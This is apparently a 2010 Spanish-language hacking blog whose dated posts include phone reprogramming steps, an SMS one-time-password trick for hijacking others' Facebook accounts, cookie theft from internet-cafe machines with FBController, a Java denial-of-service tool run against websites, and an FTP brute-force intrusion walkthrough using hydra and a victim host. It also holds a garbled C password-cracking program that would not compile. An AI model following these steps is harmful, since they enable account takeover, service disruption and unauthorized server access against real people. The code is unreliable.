11)marca el "paging channel" 0333 presiona **
12)presiona *
13)presiona *
*NOTA: pantalla debe decir "01" si lo hace, presiona "SEND"
*NOTA: Presiona RCL + # para confirmar que lo programaste correctamente, tu numero de celular debe aparecer.

Programando ERICSSON
PARA:ERICSSON
318/368/388/618/688

1)presiona 923885, presiona MENU
2)selecciona NAM 1 (pon 1)
3)ESN en pantalla (Presiona RCL)
4)pon el numero de celular, presiona RCL
5)A-key marca # (presiona RCL)
6)SID 1 (epon el sys id) presiona RCL
7)ALPHA TAG 1 (déjalo como esta) Presiona RCL
8)LOCK clave 0000, presiona RCL
9)ve al nivel 2, presiona NO
10)EXIT (save)(Presiona YES)
11)Presiona MENU
12)Presiona 3
13)Presiona 2

Gracias http://peolplearmenia.galeon.com.

saludos mundo Libre.

Mi facebook Hackeado

Saludos Mundo libre.

He aqui una tecnica para Hackear cuentas de Facebook, Muchos pero Muchos de los usuarios tiene tanta informacion en su perfil que puedes saber todo de ellos asi que solo nesecitamos el telefono celular registrado en el facebook para hackear la cuenta del usuario con solo solicitar una contraseña temporal a través de SMS, solo tienes que escribir “otp” al número 32665 desde su teléfono celular

Recordemos que solo podremos hackear las cuantas que estan con la funcion de contraseña temporal abilitada.

Facebook enviará una contraseña que puede ser utilizada una sola vez. Esta contraseña expira en 20 minutos. Se puede utilizar en lugar de la contraseña habitual del miembro.

Asi que con un poco de pasiencia tendras la cuenta que quieras.
Feliz Hacking.

Saludos Mundo Libre.

domingo, 17 de octubre de 2010

Windows vs Linux

Saludos Mundo libre.

Costo beneficio he aqui las diferencias de windows contra linux para mi linux es la mejor transferencia para dejar el moustro de windows si costo y un mejor beneficio y mucho mas estable linux.

Windows de paga Linux libre Descripcion

Outlook Express / Kmail, Mozilla Thunderbird Programa de correo
Outlook / Ximian, kontact Programa de correo
electronico con
agenda y calendario
Office / OpenOffice.org, koffice Paquete de ofimática
Messenger, ICQ, Yahoo, AIM / Kopete, Pidgin Programa de mensajeria
PhotoShop / The Gimp Programa de diseño
Corel Draw / Sodipodi, Inkscape Dibujo vectorial
3D Studio Max / Blender Diseño 3D
Autocad / QCad Programa de ACAD
Internet Explorer / Konqueror, FireFox Navegador Web
Windows Media, VLC / Xine, Mplayer, Kaffeine, VLC Reproductores de video
Winamp / xmms Reproductores de sonido
Acrobat Reader / kview, kpdf Visualizador de archivos .pd
Nero / K3b Aplicación para grabar CD's y DVD's
Cute FTP, FileZilla / KBear, gftp, FileZilla Aplicación de transferencia de archivos (FTP)


Puede encontrar una gran cantidad de aplicaciones Windows con sus iguales en Linux, en la web Alternativas Libres.

http://www.freealts.com/

Saludos Mundo Libre

jueves, 14 de octubre de 2010

FBController

Saludos Mundo Libre

FBController.exe es un programa creado por AZIM POONAWALA que se dice en la red que rompe las barreras de facebook pero no es cierto lo que hace este exelente programa es leer las cookis del historial asi que seria bueno tenerlo en tu usb y andar por los cafes internet explorando los historiales para sacar los usuarios y passwor de facebook la syntaxis es muy sencilla solo hay que correrlo desde la shell de windows de la siguiente manera


────────────────────────────────────────────────────────────────────────

█░█░█░█░█░█░█░█░█░ ╔═ █░█░█░█░█░█░█░█░█░
█░█░█░█░█░█░█░█░█░ ╔═ âÇëb°°k CÖⁿ┼rollΣr version 1.0 █░█░█░█░█░█░█░█░█░
█░█░█░█░█░█░█░█░█░ ╟ █░█░█░█░█░█░█░█░█░

────────────────────────────────────────────────────────────────────────

♦♦♦♦♦♦♦ The Ultimate Facebook Controller ♦♦♦♦♦♦♦
■■■■■■■■ To Control Facebook without the Password ■■■■■■■■■

▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲
▲ ▲
▲ ▲
▲ Coded by : QUAKERDOOMER (Azim Poonawala) ▲
▲ quakerdoomer [< @ >] fmguy.com ▲
▲ ▲
▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲▲


Syntax: "FBConTroller.exe" datr ABT s_vsn_facebookpoc_1 login_x xs c_user h_user

Example: "FBConTroller.exe" 1240660791-5c29eb61252481b55137e8919dbc4a560d9aab46
0479025d543f9 b0ad8a8df29cc7bafdf91e67c86d58561st0A1241265591AA 7369244034442 a%
3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22tomy%40email.sk%22%3Bs%3A19%3A%22reme
mber_me_default%22%3Bb%3A0%3BD 0c38a69708eeff53962b611d3fc9111e 1166357033 09c12
9e811cf

╪ So What (TF!) have you done lately ? -- Wesley [WANTED, 2008] ╪

Press any key to continue . . .

En donde aparece la numeracion es el registro de las cookies asi que hay que explorar que la solucion esta.

el programa esta en nuestros achivos de
http://mx.groups.yahoo.com/group/escuelahackerenpuebla

Saludos Mundo Libre.

martes, 12 de octubre de 2010

ESF fingerprinter

Saludos Mundo Libre

La toma de huellas dactilares de SQL Server puede ser un proceso que consume tiempo. Se trata de un estudio de muchos errores y métodos para la huella digital para saber exacta la versión de SQL Server. Intencionalmente la inserción de una entrada no es válida para obtener un mensaje de error típico o el uso de ciertos alfabetos que son únicos para un servidor Son dos de las formas a la posibilidad de la huella digital de un servidor.

Pero, cuando se trata de la toma de huellas dactilares de Microsoft SQL Server, Exploit Next Generation ® SQL Server ™ de huellas dactilares (FKA Microsoft SQL Server de huellas dactilares Tool) es la mejor herramienta!

El Exploit Next Generation ® SQL Server ™ de huellas dactilares (FSE) es una poderosa herramienta que lleva a cabo la versión para la toma de huellas dactilares de:

1.Microsoft servidor SQL Server 2000;
2.Microsoft servidor SQL Server 2005, y
3.Microsoft servidor SQL Server 2008.

El Exploit Next Generation ® SQL Server ™ utiliza la huella digital técnicas bien conocidas sobre la base de varios instrumentos públicos que sean capaces de identificar la versión de Microsoft SQL Server (tales como: SQLping y SQLver), pero, en lugar de mostrar sólo la "cruda versión" (es decir, , Microsoft SQL Server Versión 10.00.2746), el exploit Next Generation ® SQL Server ™ muestra la huella digital asignada versión de Microsoft SQL Server (por ejemplo, Microsoft SQL Server 2008 Service Pack 1 (5 um)).

Explotar los puntos fuertes de la próxima generación ® ™ SQL huellas dactilares son las siguientes:

1.It utiliza los protocolos TCP y UDP para determinar la versión de Microsoft SQL Server, lo que es mucho más confiable que cualquier otro instrumento público o comercial.

2.It es capaz de identificar las múltiples instancias de Microsoft SQL Server y sus puertos de comunicación TCP.

3.It no requiere de ningún método de autenticación para identificar la versión de Microsoft SQL Server.

4.It utiliza el algoritmo probabilístico para identificar la versión de Microsoft SQL Server, que combina los protocolos TCP y UDP de huellas dactilares.

Seguir leyendo en en el siguiente link

fuente http://code.google.com/p/esf/

texto traducido por google traductor.
gracias a http://code.google.com/p/esf/

Saludos Mundo Libre

lunes, 11 de octubre de 2010

Como va mi desface

Saludos Mundo Libre

Cuando estas atacando una web y quieres averiguar que esta o no esta dando resultado esta es una exelente web para monitoriar el desface asi que aqui esta.
solo hay que poner la web y listo tedira si esta off o no.
http:www.estacaido.com

Saludos Mundo Libre.

domingo, 10 de octubre de 2010

Manteniendonos en la red

Saludos Mundo Libre

Ayudando a mantenernos en la red con un CLIK solo clikea los anuncios publicitarios para que sigamos en la red Mundo Libre gracias.

Saludos Mundo Libre

sábado, 9 de octubre de 2010

Como dejar una web sin conexion

Saludos Mundo Libre

Como dejar una web sin conexion voy ablar de una aplicacion creada por Cr4z1 diseñada para dejar webs sin conexion la bentaja de esta aplicacion es que esta creada en java lo que la hace multiplataforma para mi es una exelente herramineta para hacer un ataque Dos desde la pc.

El uso de la harreamienta es muy facil solo hay que colocar la web a atacar y listo lo unico que nesecita es tener java instalado.

lo podemos descargar de una exelente web la liga es.

http://troyanosyvirus.com.ar/

ahora el archivo biene comprimido y hay que descomprimirlo en la ruta.
c:\windows\system32\bin

y la herramienta arranca con un simple.
c:\windows\system32\bin\d2

y acontinuacion aparece esto.

C:\WINDOWS\system32\Bin>d2
(Sintaxis WWW.google.com)
:www.web.com

despues damos enter.

even
odd
even
odd
even
odd
even
odd
even
odd
even
odd
even
odd
even
odd
even
odd
even
odd
even
odd
even
odd





-OWNED!-

Created by Cr4z1 And D4rk Cl0wn

IP: www.web.com
Port: 80
9999s long
200 threads

Press Enter to Start..

y arranca.

All Ttreads created
.=Site Working
x=Site Crashing
...................................................
...................................................
...................................................
...................................................
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxx............................
..xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
la conexion funciona mientras tengamos el programa en arranque.

Saludos Mundo Libre

jueves, 7 de octubre de 2010

Ataque Proxy

Saludos Mundo libre

Ataque proxy voy hablar de un exelente programa para linux y windows para realizar ataques proxy.

Es libre pero hay que apollar a los programadores de este exelente programa
asi que hay que donar o agradecer por su programa.

El Zed ataque Proxy (ZAP) es una herramienta fácil de usar integrado pruebas de penetración para encontrar vulnerabilidades en aplicaciones web.

Está diseñado para ser utilizado por personas con una amplia gama de experiencia en seguridad y como tal es ideal para desarrolladores y probadores funcionales que una nueva prueba de la penetración.

ZAP ofrece escáneres automáticos, así como un conjunto de herramientas que le permiten encontrar las vulnerabilidades de seguridad de forma manual.

La versión actual de ZAP es la 1.0.0 y se puede descargar desde la página de Google Code.

Algunas de las características de ZAP:

Interceptar proxy
Automatizado de escáner
Pasivos del escáner
Spider
Algunas de las características de ZAP:

Fácil de instalar (sólo requiere Java 1.6)
Facilidad de uso en una prioridad
Integral de las páginas de ayuda
En desarrollo activo
De código abierto
Libre (sin pago de 'Pro' versión)
Multiplataforma
Participación activa anima
ZAP es un tenedor de la buena reputación de Paros Proxy.
Escuchar
Leer fonéticamente
Diccionario - Ver diccionario detallado

dejo la liga para que lo descarguen

http://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

Saludos Mundo Libre

miércoles, 6 de octubre de 2010

Password

Saludos Mundo Libre

He aqui un Programa escrito en c++ para desencriptar password de windows hay que compilarlo y sacar el ejecutable despues copiarlo en la maquina victina y listo tenemos el password de la maquina saludos.

codigo:

#include
#include
#include
#include
#include
#include

unsigned char huge data [100001];
unsigned char keystream [1001];
int Rpoint[300];

void main (int argc,char *argv[]) {
FILE *fd;
int i,j,k;
int siza;
char ch;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300];

if (argc<2) {
printf ("usage: glide filename (username)");
exit (1);
}
fd=fopen(argv[1],"rb");
if(fd==NULL) {
printf("cant open file %s",argv[1]);
exit(1);
}
size=0;
while(!feof(fd) {
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);

name=agrv[1];
if(argc>2) name=agrv[2];
printf("Username: %s\n",name);

cracked=size-0x02008;
if(cracked<0) cracked=0;
if(cracked>1000) cracked=1000;
memcpy(Keystream,Data+0x208,cracked);

for(i=0;<20;i++) {
ch=toupper(name[i]);
if(ch==0) break;
if(ch=='.') break;
Keystream[i]^=ch;
};
cracked=20;

sizemask=Keystream[0]+(Keystream[1]<<8);
printf("Sizemask: %04X\n",sizemask);

fot(i=0;i<256;i++) Rall[1]=0;

maxr=0;
for(i=0x108;i<0x208;i++) {
if(Data[1]!=0xff) {
Rall[Data[1]]++;
if (Data[i]>maxr) maxr=Data[i];
}
}
maxr=((maxr/16)+1)*16);
Rpoint[0]=0x0208+2*maxr+20+2;
for(i=0;ipos=Rpoint[i];
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i,Rall[i]);
if(Rall[i]==0) && (rzs!=0) ) {
printf("unused resource has nonzero size !!!\n");
printf("If last line produce any : you many try to recover\n");
ch=getch();
if(ch!='y') exit(0);
rsz=2
i-=1;
}
pos+=rsz;
if(iwhile(Data[pos+3]!=Keystream[1]) {
printf(".",Data[pos+3]);
pos+=2;
}
}
pos+=2;
Rpoint[i+1]=pos;
}
Rpoint[maxr]=size;
for(i=0;i <=maxr;i++) {
Keystream[20+2*i]^=Rpoint[i] & 0x00ff;
Keystream[21+2*1]^=(Rpoint[i] >> 8) & 0x00ff;
}
cracked+maxr*2+2;
printf("%d byte of Keystream recoverd\n",cracked);
for(i=0;i< maxr;i++) {
rsz-Rpoint[i+1]-Rpoint[i];
if (rsz>cracked) rsz=cracked;
printf("Recource[%d] (%d)\n",i,rsz);
for(j=0;jprintf("\n");
}
exit(0);
}

Saludos Mundo Libre

martes, 5 de octubre de 2010

Los Secretos de Google AdSense

Saludos Mundo Libre.

He aqui el famoso libro de Los Secretos de Google AdSense ya que cuenta con derechos de autor y no podemos trasmitir a terceros la informacion contenida en este libro lo boy a subir a nuestra liga.

este libro trata de agregar a nuestras webs propoganda por medio de AdSense para que el usuario clike los anuncios publicitarios y asi obtener ganancias esta bueno asi que se los dejo en mi liga.

solo usuarios registrados podran verlo.

http://mx.groups.yahoo.com/group/escuelahackerenpuebla

Saludos Mundo Libre

lunes, 4 de octubre de 2010

inspathx

Saludos Mundo Libre
boy a esplicar inspathx es una herramienta que utiliza el árbol de las fuentes locales para hacer peticiones a la dirección URL y busca la inclusión camino (Ruta completa divulgación) mensajes de error. Es un problema muy común en aplicaciones web PHP
que los cultivos de un lote.

PHP desarrolladores de aplicaciones web a veces no añadir los controles de seguridad contra las autenticaciones, etc inclusión de archivo y son propensos a revelar información sensible posible cuando las direcciones URL de las aplicaciones son solicitados directamente. A veces, es una clave para la inclusión de archivos locales (LFI), la vulnerabilidad. Para las aplicaciones de código abierto, el código fuente puede ser descargado y comprobado para encontrar dicha información.
Este script va a hacer este trabajo.

A. Primero hay que descargar el fichero archivado fuente de su software libre que desee.
B. En segundo lugar, extraer su contenido.
C. En tercer lugar, alimentar a su ruta de acceso a inspath

inspathx acepta los siguientes argumentos:

◦ argumento-d o-dir como directorio de origen (de aplicación)
◦-u o-url argumento como la dirección URL base de destino (como http://victim.com)
◦-t-argumento o las discusiones como el número de subprocesos para ejecutar al mismo tiempo (por defecto es 10)
Puede descargar inspathx a través de SVN aquí:

svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx-de sólo lectura


como siempre es una aplicacion que solo corre en linux .

Saludos Mundo Libre.

sábado, 2 de octubre de 2010

hydra

Saludos Mundo Libre he aqui un programa exelente si se an topado con una wed con el puerto 21 ftp abierto pues aqui esta hydra una aplicacion de fuerza bruta que pormedio de un user list y un passwords list intenta encontrar el usuario y el password para poder acceder por el puerto 21 abierto y asi explorar el servidor para ya sea un desface o solo por investigar el funcionamiento es muy sencillo es por medio de una shell de windows,

1.- descargarmos el programa de nuestro group la liga es
http://mx.groups.yahoo.com/group/escuelahackerenpuebla.

2.- lo instalamos en el direcctorio c:/

3.- abrimos 3 shell una para hydra una para nmap y la ultima para el tracert.

4.- scaneado la web y encontramos el puerto 21 es hora de arrancar hydra de esta forma.

5.-c:\hydra>hydra -l user -P passwords.txt -e ns -vV ip victima ftp

6.- empiesa a trabajar el programa y cuando se deteniene ya encoontro el user y password.

7.-a hora solo hay que conectarnos por ftp de la siguente forma.

8.- c>\ftp www.victima.com
Connected to victima.com
220-Microsoft FTP Service
220.
user>:user (aqui lo que hydra nos lanzo como usuario)
331 Password Required for usuario
Password: (aqui el que hidra nos lanzo como password).

9.- y solo nos queda explorar el directorio de la web y hacer lo que quieran.

Saludos Mundo Libre.